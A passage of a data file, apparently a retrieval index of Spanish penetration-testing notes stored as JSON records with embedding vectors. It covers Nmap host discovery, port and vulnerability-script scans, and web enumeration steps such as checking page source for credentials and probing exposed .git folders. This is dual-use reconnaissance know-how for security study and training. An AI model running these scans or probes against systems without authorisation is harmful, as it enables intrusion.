-0.03488, -0.0713, 0.0736, -0.01021, 0.00321, 0.00442, 0.03383, 0.03535, -0.03135, 0.05518, 0.00018, -0.0681, -0.03561, 0.05772, 0.07702, 0.02567, -0.07698, 0.02388, 0.08934, -0.04381, -0.08264, -0.11738, -0.03549, 0.01195, 0.01795, 0.04482, 0.00895, 0.03757, 0.00043, -0.05067, 0.00323, -0.02101, -0.04745, -0.10266, 0.0389, -0.05704, 0.04411, -0.01445, 0.01431, -0.11776, 0.01725, 0.02675, 0.00988, 0.02958, -0.00588, -0.04408, -0.02708, -0.03537, -0.00819, 0.0159, 0.02946, -0.01352, 0.01618, -0.0709, 0.00171, 0.0104, 0.00932, -0.01746, 0.00416, -0.03239, 0.0965, 0.01675, -0.01573, -0.00362, -0.07506, -0.02869, -0.0507, -0.05651, 0.01551, 0.02738, 0.04513, 0.11898, -0.01802, -0.03712, 0.04161, 0.01979, 0.01146, -0.042, 0.0094, -0.08402, -0.03154, 0.05973, 0.03897, -0.01447, -0.04202, 0.04177, 0.00345, 0.02508, -0.03066, -0.0492, 0.02832, 0.02178, 0.02141, -0.0445, 0.0056, 0.029, 0.0629, -0.08377, 0.03191, 0.01411, -0.08247, 0.04681, -0.03412, 0.00868, -0.06386, -0.01454, 0.044, -0.00864, -0.01321, -0.08662, -0.01134, -0.03103, 0.04644, -0.00064, 0.02122, -0.04517, -0.01888, -0.04616, 0.0284, 0.02819]} +{"tipo": "metodologia", "herramienta": "Nmap", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "texto": "## Descubrimiento de hosts\n```bash\nsudo nmap -sn 192.168.X.0/24 # ping sweep: quién está vivo\nsudo nmap -sn -PR 192.168.X.0/24 # ARP (LAN, el más fiable)\nsudo nmap -sn -PS21,22,25,80,445 IP/24 # TCP discovery si ICMP filtrado\n```", "v": [0.0645, -0.18194, -0.04232, -0.03704, 0.02574, -0.27378, -0.12952, -0.19296, -0.05795, 0.1527, 0.09921, -0.06123, 0.07187, -0.15301, -0.21623, 0.02682, -0.20779, 0.00599, 0.0698, 0.11029, 0.0089, 0.13241, -0.11715, -0.09713, 0.06248, 0.09631, 0.011, 0.10148, -0.02726, -0.11866, -0.02468, -0.06729, -0.01551, 0.02654, -0.05552, -0.03906, 0.01542, 0.07936, -0.00631, 0.18738, 0.00095, 0.02456, -0.08252, 0.00896, 0.03277, -0.04288, -0.0069, -0.05859, -0.04127, -0.09834, -0.07803, 0.01792, -0.10223, -0.01929, -0.05361, 0.03077, 0.0815, -0.02854, -0.03285, 0.00233, -0.0198, 0.07355, -0.02416, -0.1012, -0.02107, -0.05185, -0.0165, -0.09598, -0.08153, -0.01034, -0.09755, 0.0045, -0.03308, 0.02259, 0.10546, -0.02618, 0.02094, -0.00777, 0.08562, 0.0432, -0.02767, -0.0232, -0.13974, -0.10464, -0.08774, -0.06116, 0.05138, -0.13271, -0.06562, -0.09299, 0.04172, 0.08801, 0.01828, 0.0991, 0.0698, -0.05926, 0.02751, 0.03329, 0.02078, -0.01501, 0.00381, 0.08613, -0.10227, 0.04977, 0.04991, -0.01151, 0.08155, 0.06713, -0.03252, 0.01662, 0.04778, 0.09275, -0.06342, -0.06775, -0.00205, -0.00213, -0.04137, 0.0714, 0.02776, -0.03467, -0.08339, -0.01313, 0.03814, 0.09092, -0.03787, -0.05758, 0.05165, 0.00859, 0.08497, -0.04646, 0.02282, -0.0286, -0.01836, 0.00497, -0.04803, 0.02939, -0.01208, 0.02884, -0.06538, -0.02299, 0.03256, 0.02134, -0.04068, -0.00764, 0.0978, 0.08952, 0.02198, 0.00259, -0.03015, 0.06375, 0.05753, -0.00011, -0.00814, 0.00849, 0.04838, 0.03125, -0.04859, -0.06488, -0.03252, 0.02882, -0.00939, 0.00487, 0.08001, 0.03663, 0.00717, 0.0735, 0.00809, -0.00731, 0.07554, -0.04253, -0.04918, 0.05868, -0.014, -0.05764, -0.04695, -0.02772, 0.01338, 0.00515, 0.05593, 0.00847, 0.0243, -0.01677, -0.01775, 0.00727, -0.03057, 0.01124, -0.0031, 0.00303, -0.01546, -0.03533, 0.05074, -0.01532, -0.05044, -0.0218, 0.02678, -0.01438, -0.0165, -0.07798, 0.03339, -0.02891, -0.0535, 0.03539, -0.05289, -0.01678, -0.06521, -0.04523, -0.07521, -0.0406, 0.00638, 0.00689, 0.02876, 0.01341, 0.04622, -0.02397, -0.04163, 0.00678, 0.01835, 0.03114, 0.05742, -0.04183, 0.01116, 0.03772, 0.0469, 0.02442, 6e-05, 0.01294, 0.02248, 0.02134, -0.0195, -0.02755, -0.06451, -0.00297, -0.0361, -0.05309, 0.03777, -0.02418, -0.02269, 0.05996, -0.00723, -0.07618, 0.039, 0.02775, -0.0755, -0.0597, -0.03231, -0.00658, -0.06108, 0.02398, 0.04836, -0.02938, 0.01033, -0.04869, 0.0057, -0.02804, -0.02147, 0.05121]} +{"tipo": "metodologia", "herramienta": "Nmap", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "texto": "## Escaneo de puertos\n```bash\nsudo nmap -sS 192.168.X.0/24 -oG full.txt # SYN top-1000, greppable\nsudo nmap -p- -Pn --min-rate 5000 -n --open IP # TODOS los 65535, solo abiertos → Puertos olvidados\nsudo nmap -sU --top-ports 50 -T4 IP # UDP (SNMP/TFTP/NTP)\nsudo nmap -sCV -p 22,80,445 IP # versión + scripts default → Nmap NSE\nsudo nmap -p80 --script vuln IP # NSE de vulnerabilidades\n```", "v": [0.06812, -0.17403, -0.13725, -0.10152, 0.04838, -0.16169, -0.05127, -0.14809, -0.08808, 0.20024, 0.04762, -0.03556, 0.09091, -0.12036, -0.27351, 0.01235, -0.17206, -0.10502, 0.12182, 0.08192, -0.06379, 0.13761, -0.06103, -0.06117, 0.05129, 0.16619, -0.08568, 0.08512, -0.04911, -0.12025, -0.02396, -0.07284, -0.06347, -0.0622, -0.06627, -0.0523, 0.04005, 0.01151, 0.01698, 0.13227, 0.05444, 0.10673, -0.09016, 0.01003, 0.12617, -0.02395, 0.0311, -0.03014, 0.05208, -0.07306, -0.0649, -0.06076, -0.07187, -0.04215, -0.1346, 0.10042, 0.1437, -0.01613, -0.04741, 0.04958, -0.04717, 0.08341, 0.01325, -0.16182, -0.03111, -0.07026, -0.05635, -0.06011, -0.12848, 0.00181, -0.06986, 0.02102, -0.07157, 0.05279, 0.10206, -0.04042, -0.00758, -0.05353, 0.07035, 0.07388, 0.0248, 0.0017, -0.1606, -0.0726, -0.13987, -0.06565, 0.01149, -0.0851, 0.00245, -0.07237, 0.07223, 0.04445, 0.04227, 0.07201, 0.04959, -0.08436, 0.01436, 0.06279, -0.00434, -0.02038, 0.0062, 0.14285, -0.08093, 0.03811, 0.07665, 0.03851, 0.05869, 0.04222, 0.05866, 0.05529, 0.06087, 0.07811, -0.0441, -0.06759, 0.00581, -0.03072, -0.02523, -0.0004, 0.00467, -0.08861, -0.02209, -0.04718, 0.00444, 0.03583, -0.00652, 0.00171, 0.01557, 0.03994, 0.05229, 0.01021, 0.00924, -0.00553, -0.02198, 0.01442, -0.01587, 0.04004, 0.03497, -0.02994, -0.04026, 0.04013, 0.00387, 0.01815, -0.01351, 0.0167, 0.06773, -0.00224, 0.0077, -0.05385, -0.0329, 0.05273, 0.05426, 0.00225, -0.05077, -0.01106, -0.012, 0.00487, -0.01201, -0.05856, -0.01765, 0.03747, 0.03197, 0.02338, 0.01541, 0.05366, 0.01434, 0.02197, -0.03337, 0.02022, 0.05481, -0.04769, -0.00669, 0.0259, -0.02347, -0.06547, -0.00501, -0.0943, 0.01663, -0.0329, -0.00091, -0.01047, 0.01795, -0.02326, 0.00653, -0.00603, -0.02473, -0.02912, 0.02891, -0.05302, -0.01489, -0.01427, 0.00653, 0.03439, -0.00247, -0.01866, 0.04756, 0.0025, -0.0233, -0.06297, -0.03166, -0.02113, -0.07193, 0.03459, -0.04667, -0.04252, -0.00747, -0.03051, -0.0257, 0.01439, -0.0621, 0.02442, 0.01622, -0.02516, 0.03322, -0.00189, -0.05062, -0.02577, -0.01676, 0.05565, 0.05993, -0.03886, -0.03369, 0.05233, 0.00607, 0.00169, -0.01182, -0.04295, 0.0165, -0.02032, 0.03295, -0.02256, -0.02954, 0.00214, -0.04128, -0.05895, 0.03437, 0.0047, -0.03421, 0.01781, 0.00616, 0.00461, 0.00965, -0.0011, -0.02886, -0.06428, -0.03407, -0.04007, -0.05187, 0.04516, 0.01337, 0.00454, 0.01858, -0.01154, -0.02021, -0.03893, -0.03236, 0.01043]} +{"tipo": "metodologia", "herramienta": "Nmap", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "texto": "## El combo de dos pasos (patrón real)\n```bash\nnmap -p- -Pn --min-rate 5000 -n --open IP # 1) rápido: ¿qué puertos abren?\nnmap -sCV -p 22,80,445 IP # 2) dirigido: versión+scripts sobre esos\n```\n`-sCV` = `-sC` (scripts default) + `-sV` (versión). Luego `searchsploit` por versión → searchsploit.", "v": [0.0318, -0.05776, -0.04592, -0.10869, 0.02806, -0.28791, 0.14899, -0.17475, 0.00364, 0.02716, 0.15127, -0.08331, -0.00651, -0.12468, -0.10456, 0.00807, -0.10388, -0.06338, 0.0846, 0.04442, -0.0587, 0.05478, -0.12054, -0.02717, 0.0276, 0.18444, -0.12352, 0.15642, -0.08783, -0.09969, -0.05609, 0.002, -0.10028, -0.01126, -0.09936, -0.07153, 0.02265, 0.04132, -0.02603, 0.21106, 0.00344, 0.01856, -0.08638, 0.06967, 0.12122, -0.15049, 0.08434, 0.00716, -0.06511, -0.0795, -0.07316, 0.03441, -0.07207, 0.07478, -0.09242, 0.01373, 0.08976, -0.01842, -0.08726, 0.0147, 0.04301, 0.04793, -0.07605, -0.08517, 0.04013, -0.01545, 0.01309, -0.07415, -0.10856, 0.00336, -0.10624, 0.02283, -0.10024, 0.06265, 0.09646, 0.00127, -0.02509, -0.12008, 0.06509, 0.11096, -0.01402, -0.06112, -0.05249, -0.05285, -0.0396, -0.06233, 0.02881, -0.04496, 0.02723, -0.07173, 0.08851, 0.05243, 0.00522, 0.02681, 0.02434, -0.15488, 0.0014, 0.02173, 0.03668, 0.0489, -0.00339, 0.05105, -0.0763, 0.09821, 0.02873, 0.08734, 0.11525, 0.02397, -0.02442, 0.04846, 0.14471, 0.03405, 0.04296, -0.04309, 0.04773, 0.04633, -0.00572, -0.03955, -0.00213, -0.03053, -0.01582, -0.03432, -0.02276, 0.05696, -0.00984, -0.0581, -0.00026, 0.00283, 0.04174, -0.0164, -0.06851, -0.03467, -0.02226, -0.03486, -0.02175, 0.07, 0.0892, -0.01666, -0.03954, -0.02105, 0.04691, 0.03513, 0.02803, 0.05741, 0.12001, -0.05087, -0.00318, -0.07344, -0.03139, 0.05421, 0.05181, 0.02892, 0.00559, 0.00106, 0.01412, -0.04275, -0.03778, -0.01063, -0.05917, 0.01202, 0.07885, 0.07443, 0.01153, 0.03734, 0.02367, -0.00248, -0.02582, -0.05698, 0.05705, -0.0257, 0.0314, -0.01269, -0.01764, -0.08263, 0.03507, -0.06018, 0.03126, -0.04631, -0.04839, 0.01588, 0.04066, -0.02544, -0.0419, 0.03255, 0.01885, -0.05256, 0.05344, -0.02884, -0.01971, -0.04015, 0.03024, -0.00236, -0.0125, -0.02608, 0.02449, 0.04523, -0.00281, -0.07052, -0.00552, -0.0177, -0.09776, 0.00146, -0.03442, -0.04553, 0.0142, 0.01939, -0.02508, 0.04157, -0.03336, -0.03512, -0.02979, -0.00925, 0.04436, 0.03414, -0.04973, -0.02291, -0.06294, 0.03394, 0.03096, -0.03766, -0.04639, 0.0717, -0.03354, 0.02712, 0.03018, -0.01236, 0.02827, -0.02925, -0.01536, -0.00363, -0.05224, 0.00832, -0.05119, -0.06306, 0.02392, -0.01835, -0.02342, 0.04693, -0.05245, -0.0283, -0.00709, -0.01087, 0.00203, -0.0422, -0.04241, -0.03775, -0.03831, 0.01587, 0.00985, 0.02766, -0.01993, -0.04075, -0.04681, -0.07326, -0.00184, -0.00249]} +{"tipo": "metodologia", "herramienta": "Nmap", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "texto": "## Salida\n- `-oN` normal (legible, los NSE salen aquí) · `-oG` greppable (1 línea/host, ideal `grep`) · `-oA` los 3.\n- Greppeo de resultados → Bucles bash sobre IPs.", "v": [-0.07891, -0.15624, 0.00424, 0.04951, 0.04618, -0.21775, -0.04496, -0.09468, -0.00241, 0.08246, -0.06707, -0.03718, -0.13475, -0.0793, 0.02885, 0.05746, -0.22169, -0.03224, 0.00374, -0.02013, -0.16722, 0.21485, -0.0479, -0.0736, -0.06159, 0.00764, 0.00321, 0.12214, -0.05973, -0.027, -0.14333, -0.15455, -0.14927, -0.19953, -0.07081, -0.12041, -0.08283, -0.01542, -0.00111, 0.11337, -0.04556, -0.07884, -0.10596, 0.01979, 0.10836, -0.12747, 0.09153, 0.09289, -0.00801, -0.03649, -0.1147, -0.0311, 0.00841, -0.01899, -0.09216, 0.09713, 0.01233, -0.01213, -0.07924, 0.05775, -0.00444, -0.03086, 0.07306, -0.1466, 0.03174, 0.01703, 0.06004, -0.03666, -0.0808, 0.0127, 0.01276, 0.05703, -0.12959, 0.00625, 0.04777, 0.00153, 0.0343, -0.00013, 0.08228, 0.03314, 0.07055, 0.03697, -0.12401, -0.01996, -0.03291, 0.01419, 0.14076, -0.21474, -0.08034, 0.03131, 0.1324, 0.06174, 0.07792, -0.03067, -0.01962, -0.14767, -0.05024, 0.09537, 0.07653, -0.04653, 0.00861, 0.08606, -0.09339, 0.07487, 0.09375, 0.07565, 0.04496, 0.13718, -0.05076, 0.01041, 0.02804, 0.01036, 0.02732, -0.03252, 0.00301, 0.04626, -0.01186, 0.05599, -0.00791, 0.02264, 0.03898, -0.02687, 0.03458, -0.00309, 0.0031, 0.02291, -0.00199, 0.0431, 0.05758, 0.0206, -0.02692, 0.04474, -0.00434, -0.05409, 0.03719, -0.02869, -0.00072, 0.00955, 0.04761, 0.01682, 0.02652, 0.01095, -0.02115, 0.0294, -0.03288, -0.08238, 0.05039, -0.01422, -0.00551, 0.03561, 0.01752, 0.05634, 0.01388, -0.01716, 0.01587, 0.01828, 0.00719, -0.00984, -0.01615, 0.00329, -0.02904, 0.01091, 0.08566, 0.01226, -0.02432, 0.05562, -0.02878, -0.00587, -0.03445, -0.04633, 0.02754, -0.01355, -0.08406, -0.00046, -0.01891, -0.01366, 0.01869, -0.00562, 0.01381, -0.02109, -0.00382, -0.01901, 0.02966, 0.02849, 0.00724, -0.00813, 0.06451, -0.03551, -0.01413, 0.0356, 0.03728, 0.00715, -0.01642, 0.00747, 0.05081, -0.04798, -0.00207, -0.05873, 0.01781, 0.03221, -0.04963, 0.00861, -0.02002, -0.01943, 0.01567, -0.06217, -0.05717, -0.06389, 0.02117, -0.01511, -0.00406, -0.03366, -0.0194, -0.01733, -0.00975, -0.02682, 0.00019, 0.00588, -0.00304, -0.02019, 0.03864, 0.03089, 0.0085, 0.0197, -0.03899, 0.00683, -0.00339, -0.06504, -0.01285, -0.05614, -0.01542, 0.01782, 0.00058, -0.01366, -0.04925, -0.0803, 0.02569, 0.00618, -0.02172, -0.0444, -0.04545, 0.0035, 0.00255, -0.00237, -0.0743, 0.01018, -0.00654, 0.01575, -0.02727, -0.03165, -0.04717, -0.02235, -0.01779, -0.04545, 0.05269, 0.02367]} +{"tipo": "metodologia", "herramienta": "Nmap", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "texto": "## Trampas\n- El top-1000 **ya** incluye 80/443/22/445. Si `grep` no saca nada y el scan cubría el puerto → **la máquina no está viva**, no es el scan.\n- `filtered ≠ open` (firewall/sin respuesta).\n- `-Pn` en un /24 = ruido (256 hosts \"up\" falsos). `-Pn` es para **1 host concreto**.\n- Confusión clásica: **SNMP = UDP/161 (`-sU`)**, **SMTP = TCP/25 (`-sS`)**.\n\nRelacionado: Nmap NSE · searchsploit · Trampas de enumeración · SMB · OSCP MOC", "v": [-0.06065, -0.20046, -0.12512, -0.08184, -0.00351, -0.26505, -0.0829, -0.04778, 0.01136, 0.16635, -0.07581, -0.03769, 0.13244, -0.10702, -0.18966, -0.01257, -0.20153, -0.07635, 0.09744, 0.1233, -0.05047, 0.0147, -0.0731, -0.09781, 0.05465, 0.14121, -0.0997, 0.05481, -0.08822, -0.06833, 0.1002, 0.01207, -0.04095, -0.05722, -0.01063, -0.05522, 0.03458, -0.03242, 0.02833, 0.15716, 0.02059, 0.04655, -0.09777, 0.07491, 0.04203, -0.06411, 0.01399, 0.04494, -0.00019, -0.01871, -0.11997, -0.03123, -0.10762, -0.01638, -0.09875, -0.02092, 0.08864, 0.06644, -0.00459, -0.04834, 0.03266, 0.0819, -0.01983, -0.13736, -0.02237, -0.01795, 0.06143, -0.06058, -0.04092, 0.02093, -0.0451, -0.00753, -0.04291, -0.06905, 0.05489, -0.07747, 0.08077, -0.08914, 0.16964, 0.07667, 0.02083, -0.09054, -0.04817, -0.08744, -0.07855, -0.03195, 0.05467, 0.01106, -0.03017, 0.02735, 0.04256, 0.07545, 0.00316, 0.09122, 0.06765, -0.17372, 0.00185, 0.00431, 0.03161, 0.04341, 0.07952, 0.08804, -0.11431, 0.036, 0.04415, 0.05052, 0.09325, -0.0095, 0.03769, 0.02332, 0.05404, -0.01028, -0.04554, -0.06964, -0.0274, -0.07467, -0.04691, 0.02296, 0.05868, -0.00495, -0.02532, 0.01514, 0.00134, 0.01826, -0.00993, -0.01218, 0.04339, 0.00589, 0.09087, -0.00247, -0.02576, 0.03853, -0.0412, -0.03051, -0.03517, -0.03457, 0.00741, -0.07642, 0.05661, -0.01191, 0.04575, 0.08642, 0.02033, -0.0088, 0.01736, 0.02453, -0.0148, -0.04316, -0.03262, 0.09591, 0.08622, 0.02873, 0.00798, 0.05887, 0.07041, -0.01963, -0.02463, -0.07434, -0.06033, 0.04166, 0.03788, 0.04465, 0.06248, 0.06594, -0.00814, 0.05264, 0.027, -0.03672, -0.01562, -0.09421, -0.03687, -0.00798, -0.07154, -0.00404, -0.1138, -0.03309, 0.03986, 0.01668, -0.01911, -0.04413, 0.00601, -0.03403, -0.01437, -0.02269, -0.03486, -0.02809, 0.00181, -0.02188, 0.00615, -0.01882, 0.02108, 0.02942, -0.00226, -0.02014, -0.00433, 0.01338, 0.06811, -0.10723, -0.00971, -0.01781, -0.06756, -0.02739, -0.01348, -0.05208, -0.01865, -0.00977, -0.02504, 0.01051, -0.01213, -0.02714, 0.04538, -0.02002, -0.00732, -0.05521, -0.03943, -0.02545, -0.03099, 0.06474, 0.06855, 0.03252, -0.03075, 0.06348, -0.01221, 0.06478, -0.00648, -0.0392, 0.02131, 0.01528, 0.07908, -0.01379, -0.02798, 0.03786, -0.00537, -0.04744, 0.01749, -0.01385, -0.0261, 0.03324, -0.03658, -0.04406, -0.01159, 0.00165, -0.03896, -0.03993, -0.03281, -0.01842, 0.00893, 0.02079, 0.03279, -0.03162, -0.01134, -0.06584, -0.019, -0.11721, 0.04091, 0.00881]} +{"tipo": "metodologia", "herramienta": "Enumeración web", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Enumeración web.md", "texto": "# Enumeración web\n\n> Puertos 80/443/8080. El vector web es el foothold más común en standalones. Parte de Enumeración.\n> Para la **metodología de ataque** (qué probar en cada input) ve a Hacking web; aquí solo enumeras.", "v": [0.04823, -0.0128, -0.04576, -0.10245, -0.08068, -0.05364, 0.08241, -0.05511, -0.02661, -0.05637, -0.19819, 0.004, 0.01755, -0.04843, 0.0491, 0.0209, 0.11136, -0.15041, 0.09403, -0.04823, -0.15956, 0.0988, -0.12957, 0.02358, -0.0254, 0.00232, -0.10217, 0.1738, -0.03425, 0.00367, 0.06613, 0.02963, 0.00088, -0.03402, -0.1018, -0.01558, 0.05111, -0.01917, 0.09862, 0.14932, -0.05363, 0.09623, -0.0755, -0.09338, 0.00124, -0.03844, 0.02107, -0.0343, 0.05457, -0.06427, -0.02066, 0.07793, -0.10743, -0.00939, -0.06242, -0.025, 0.16219, -0.00081, -0.05278, -0.00393, 0.05909, -0.00846, -0.05191, -0.08154, 0.03563, -0.04555, -0.03171, 0.07203, -0.06453, 0.07647, 0.04093, -0.04032, -0.01428, -0.10495, 0.16379, -0.05522, 0.03305, 0.0944, 0.06641, 0.02457, 0.08008, -0.04056, -0.07623, -0.08397, -0.08384, 0.01993, -0.00369, -0.10626, -0.00946, -0.08553, 0.13006, -0.02338, 0.0008, -0.06437, -0.06599, -0.12962, 0.06865, 0.03596, -0.00139, -0.10816, -0.0105, -0.03803, -0.13231, 0.01226, 0.04647, 0.0465, -0.00882, -0.05004, -0.07151, -0.06988, -0.00373, -0.04257, -0.11095, -0.06597, -0.10454, 0.01197, -0.02662, 0.05831, 0.05562, -0.09772, -0.08348, 0.01703, -0.08462, 0.03474, -0.05673, -0.06439, -0.03324, 0.04677, 0.03162, -0.03533, 0.04313, -0.08853, -0.03882, 0.00761, 0.02082, 0.06858, -0.00229, 0.0147, -0.03398, 0.03582, 0.04177, 0.03717, -0.09193, 0.01878, -0.00183, -0.01872, 0.06317, 0.03836, -0.10668, 0.00913, 0.0179, 0.05347, -0.0193, 0.05661, -0.05823, -0.06114, -0.00677, -0.11891, -0.13661, 0.06323, 0.01257, 0.02127, -0.02526, 0.02466, 0.00222, -0.01186, -0.04728, -0.03072, 0.02386, 0.00788, 0.00712, 0.06845, -0.04961, -0.14914, 0.06266, -0.01158, -0.11734, -0.0365, -0.04127, 0.01293, 0.05508, -0.02092, 0.03933, -0.06444, -0.01471, -0.00902, 0.00797, 0.06383, -0.03418, 0.06024, 0.03735, -0.03812, -0.07325, 0.00723, 0.0295, 0.06353, -0.07222, -0.04277, -0.0202, -0.03051, -0.06169, -0.01056, -0.01332, -0.01864, 0.03079, 0.06783, -0.0443, -0.104, -0.03827, 0.02821, 0.05047, -0.0752, 0.04569, -0.04303, -0.03776, -0.06019, 0.06135, 0.04101, -0.01156, 0.05995, 0.00329, 0.01218, -0.01673, 0.08344, 0.05377, 0.02312, -0.01158, -0.02597, -0.00605, -0.04278, 0.00565, -0.13604, -0.01625, -0.01959, -0.02058, 0.0031, 0.02588, 0.01516, -0.08557, -0.01761, 0.00189, -0.05273, -0.00951, 0.00341, 0.01416, -0.12076, -0.05234, -0.01283, -0.03973, -0.0366, -0.01923, -0.09451, -0.05086, -0.01872, -0.00799, -0.02839]} +{"tipo": "metodologia", "herramienta": "Enumeración web", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Enumeración web.md", "texto": "## Primero, lo manual\n```\nCtrl+U siempre → comentarios con creds, paths, endpoints\nJS embebidos → APIs ocultas (LinkFinder, JSparser)\nrobots.txt → perezoso; mira también:\n sitemap.xml, .git/, .svn/, .htaccess, .DS_Store,\n backup/, old/, dev/, test/, admin/\n```", "v": [0.17757, -0.15194, -0.16591, -0.0882, 0.04674, -0.15484, -0.06315, -0.09369, 0.06008, 0.0575, -0.12815, -0.13962, -0.02704, -0.07202, 0.07193, -0.03116, 0.15671, -0.05277, 0.01187, 0.01705, -0.01313, 0.00613, -0.0931, -0.02341, 0.05439, 0.06899, 0.01515, 0.0643, -0.19937, 0.04975, -1e-05, -0.03087, -0.09135, 0.02605, -0.15116, 0.00455, -0.02595, 0.11225, -0.00983, 0.17363, 0.01616, 0.03949, -0.07564, 0.141, -0.09635, -0.12076, 0.10874, 0.00349, 0.02926, -0.10729, -0.05213, -0.0233, -0.2, 0.02088, -0.02477, -0.05134, 0.17809, -0.06233, -0.03767, -0.05791, -0.08072, 0.10172, -0.02998, -0.02577, -0.02649, -0.06716, 0.03845, -0.04364, -0.13221, 0.10724, -0.08193, 0.09064, 0.03085, -0.05534, 0.01109, -0.03594, 0.05662, -0.05079, 0.04943, 0.09966, -0.06476, -0.03366, -0.04986, 0.02855, 0.00358, -0.04467, -0.01953, 0.01688, -0.10099, -0.10862, 0.06332, -0.00326, -0.0361, 0.04601, 0.06852, -0.02929, 0.01506, -0.01596, 0.0141, -0.03365, -0.02981, -0.00855, -0.06841, 0.06134, 0.08907, 0.07175, 0.08139, -0.00702, 0.03975, -0.01851, 0.20499, 0.04269, 0.03286, -0.01874, -0.02187, 0.02179, -0.06501, 0.01774, -0.03304, -0.06711, 0.00411, -0.07931, -0.05241, -0.01129, -0.02659, 0.01346, -0.00638, 0.07166, -0.00658, -0.06194, 0.01145, -0.04408, -0.04894, 0.02104, -0.02136, 0.11923, 0.09808, 0.07995, -0.03551, -0.02001, -0.02913, 0.07531, 0.02374, 0.02764, 0.08516, 0.01767, -0.03893, -0.04667, -0.00919, -0.0087, 0.01485, 0.05108, -0.00018, 0.00134, -0.01629, -0.05901, -0.06053, -0.04516, -0.07234, 0.03184, 0.00388, 0.05681, 0.03666, 0.07239, -0.01392, 0.01767, 0.07089, -0.05665, 0.03227, -0.04704, 0.03712, 0.08294, -0.04645, -0.14078, 0.00914, -0.03235, 0.05364, -0.0319, 0.06869, -0.00897, 0.00961, -0.03678, -0.00608, 0.05954, -0.01957, -0.05686, 0.04747, -0.02949, 0.00445, -0.01951, -0.01, -0.01655, -0.03297, -0.00567, 0.05362, 0.0025, -0.04307, -0.01205, -0.04732, 0.00996, -0.04673, -0.0054, -0.0043, -0.04898, -0.00853, -0.00323, -0.01371, 0.0141, -0.04483, -0.0099, 0.02443, -0.0265, 0.00263, 0.0094, -0.02814, -0.08618, -0.0745, 0.04533, -0.02183, 0.01694, -0.01085, 0.058, 0.03086, -0.04138, 0.07121, -0.00733, 0.07175, -0.01419, 0.02237, 0.01576, -0.03586, 0.02308, -0.02609, -0.04009, 0.05769, -0.03219, 0.01812, 0.02156, 0.01405, -0.0715, -0.0272, 0.03332, -0.01748, -0.05149, -0.05269, -0.053, -0.05975, -0.00663, 0.0144, -0.04685, -0.0053, -0.03848, 8e-05, -0.05895, -0.0051, 0.00484]} +{"tipo": "metodologia", "herramienta": "Enumeración web", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Enumeración web.md", "texto": "## Fuzzing de contenido\nBrute force de rutas/ficheros con gobuster/feroxbuster/ffuf → nota dedicada: Content discovery.\n- Hostnames/vhosts → Vhosts y subdominios.\n- Intercepta y manipula todo con Burp Suite.", "v": [-0.0692, -0.22939, -0.18798, -0.16536, 0.06914, -0.01949, -0.04119, -0.11518, 0.01943, -0.17298, -0.1345, -0.07078, -0.09354, 0.1284, -0.0005, -0.05337, 0.07962, -0.06954, -0.14456, -0.05064, 0.03692, -0.02365, -0.06164, 0.02397, -0.01254, -0.11136, -0.0692, 0.05203, -0.02631, -0.11164, 0.1547, -0.11717, 0.01802, 0.03467, -0.07196, -0.16064, -0.03909, -0.08424, 0.00486, 0.12544, 0.10729, 0.14982, -0.02114, 0.10219, -0.05025, -0.07346, -0.13527, -0.07847, 0.06144, 0.01651, 0.06947, -0.18661, 0.00449, -0.01554, -0.01339, -0.07828, -0.04923, -0.15585, -0.04494, 0.08366, 0.04251, 0.02593, -0.02, -0.08752, 0.07845, -0.03888, 0.03524, -0.0118, -0.0315, 0.03997, -0.074, -0.0017, 0.10509, -0.04623, 0.03759, -0.01587, 0.02639, 0.00506, -0.0006, 0.04733, -0.07176, 0.01904, -0.13246, 0.04341, 0.0193, -0.04445, 0.07094, -0.16343, -0.08188, -0.00138, 0.12839, -0.03137, 0.02645, 0.02209, 0.02467, -0.06196, 0.09852, 0.12018, -0.04104, -0.11149, 0.06811, 0.15075, -0.02757, 0.05544, 0.01278, -0.00209, -0.02987, 0.02433, 0.01577, -0.01033, 0.11908, 0.02396, 0.00404, 0.00084, -0.08867, -0.05503, -0.0162, 0.02516, 0.06039, -0.10497, -0.08603, -0.01294, -0.00963, 0.0609, 0.03227, 0.02938, 0.01254, 0.01068, 0.05925, -0.09479, -0.04803, -0.0489, -0.03153, 0.00104, 0.03749, -0.03244, -0.01486, 0.01786, 0.03061, -0.03786, -0.00425, -0.00277, 0.05657, 0.11806, 0.00889, 0.04684, 0.05337, -0.07125, -0.01238, 0.0024, -0.01071, -0.08012, -0.01562, -0.01622, -0.01048, 0.03323, 0.00777, -0.06646, -0.04831, -0.03184, 0.04063, -0.03335, -0.07501, -0.02986, 0.03921, -0.02435, -0.05667, 0.05235, -0.03195, -0.0156, -0.05999, 0.04006, 0.00831, -0.01776, 0.05719, 0.00041, -0.00922, -0.04097, -0.01922, -0.03549, 0.06818, -0.04327, 0.0106, 0.07883, -0.0073, 0.00544, 0.02637, 0.02016, -0.00875, -0.04615, 0.00831, 0.00185, -0.06747, 0.01925, -0.018, -0.00757, -0.02318, 0.03457, -0.02198, 0.04285, 0.01617, -0.00344, 0.0103, -0.0306, -0.05867, -0.02133, -0.02932, -0.05328, -0.03532, -0.02488, 0.03178, -0.00475, 0.02578, -0.01223, -0.01807, 0.08576, -0.00228, 0.00153, -0.0372, -0.01079, -0.04302, 0.07507, 0.01187, -0.04068, -0.00957, 0.00314, 0.07238, 0.0222, 0.01421, 0.04732, 0.00841, -0.02058, -0.02153, 0.04456, 0.00749, -0.0189, 0.04153, 0.04102, 0.007, 0.01725, -0.02347, -0.01807, 0.03913, 0.00609, -0.01959, -0.06577, -0.0329, 0.01272, 0.01391, 0.04367, 0.01439, -0.03926, -0.02832, -0.03588, 0.03036, 0.02022]} +{"tipo": "metodologia", "herramienta": "Enumeración web", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Enumeración web.md", "texto": "## 